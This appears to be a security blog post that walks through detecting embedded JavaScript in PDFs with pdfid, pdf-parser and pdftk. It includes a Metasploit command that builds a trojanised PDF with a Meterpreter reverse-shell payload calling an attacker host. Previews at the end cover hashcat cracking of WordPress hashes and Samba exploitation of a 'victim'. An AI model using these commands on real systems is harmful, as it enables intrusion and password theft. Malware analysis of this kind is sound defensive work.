Analyzing PDF Contains a Trojan

-
Introduction :

On this occasion I will write some stages of how to analyze a document file extension *.PDF to Determine Whether they were malicious or not.
This happened some time ago when I tried to download a study guide book and then the file is detected by anti-virus that I use. this creates great suspicion and then I try to analyze the file, and my guess is true in the document there is a java script which turns a script payload is wrapped into the document. This was some of the steps that I did to analyze.

I would do a comparison between a clean PDF document with a document containing a trojan.

Equipment :
1. pdfid
2. pdf-parser
3. pdftk.  'apt-get install pdftk'
4. strings

in the first stage I will analyze the document "analysis.pdf" that is not interrupted by trojan.


OK, now let's go it!
test a pdf file

# pdfid analysis.pdf


the output looks, we just need to pay attention to the line JS / Java Script and turns of the output you see above shows that the document is free from the presence of the insertion trojan. it proved the value displayed on the line JS / Java Script is "0"

so, it means we do not need to analyze further :)

then let's try to analyze a document containing trojans, and here I use metasploit to manipulate trojan into a pdf

# msfcli exploit/windows/browser/adobe_media_newplayer PAYLOAD=windows/meterpreter/reverse_tcp SRVHOST=192.168.1.3 SRVPORT=4455 URIPATH=/ LHOST=192.168.1.3 LPORT=4444 E



Next try to download the file


pdf version that is in use metasploit to wrap trojan into the document using the 1.5 version shown in the image above.

ok, then do the test file
# pdfid trojanPDF.pdf


seen the value shown in line JS / Java Script is "1", meaning that there is a pdf file javascript command, then let's look further.

subsequently using the "strings" to show the line of java script
# strings trojanPDF.pdf


I just showed multiple outputs and no java script that appears in the form of text, this may be an attempt metasploit java to encrypt text into a form that is more difficult, hmm I like metasploit :)

next, parse the PDF document
# pdf-parser -f trojanPDF.pdf

-f = pass stream object through filters


above also do not see any of his text javascript, metasploit make a very good encryption :)

and here I will create duplicate documents and remove all the encoding of a document "trojanPDF.pdf" and copy it to the new document "trojanPDF-2.pdf"

# pdftk trojanPDF.pdf output trojanPDF-2.pdf uncompress


subsequently using the "strings" to display the look of printable documents *.pdf


yuhuu, now we find the JavaScript text in it as shown in the picture above.

I think I need to download other guide books that are not infected with trojan :)

Regards
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

-
Image
Hy, I'm back again. I will discuss how to Decrypt a password in the form the MD5 hash wordpress. here are some examples of hash md5 encryption wordpress will we Decrypt: HASH                                                                                  PASS $P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne  $P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez $P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123 $P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3 $P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d many of my friends are overwhelmed when decrypt wordpress md5 hash. so are they wasting their jobs because they could not solve this one password. Equipments: 1. Hashcat             ==> Decrypt Hash 2.  Rockyou.txt       ==> Wordlists 3. Hash-Identifier   ==> to see hash mode Here I use the Operating System Kali Linux. First Step : we see the  kind of hash we will Decrypt. to facilitate us in decryption
Read more

Exploit Samba "SmbClient"

-
Image
Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-PC. now,
Read more

Configure Pure-FTP on Kali Linux

-
Image
FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21. Contents : 1. Installasion 2. Configuration 3. Run Installation Pure-Ftpd # apt-get install pure-ftpd Installation Success =)) Configure Ftpd add new group: # groupadd ftpgroup add user: # useradd -g ftpgroup -d /dev/null -s /etc ftpuser -g =  name or ID of the primary group of the new account -d = home directory of the new account -s = login shell of the new account configure store a list of users: # pure-pw useradd myftp -u ftpuser -d /home/ftp/pub/myftp myftp = your ftp username please enter you password. configure puredb database file # pure-pw mkdb The next entry to the directory /etc/pure-ftpd/auth/ # cd /etc/pure-ftpd/auth then Create hard links by default: # ln -s ../conf/PureDB 60pdb then, make a directory /ftp # mkdir /home/ft
Read more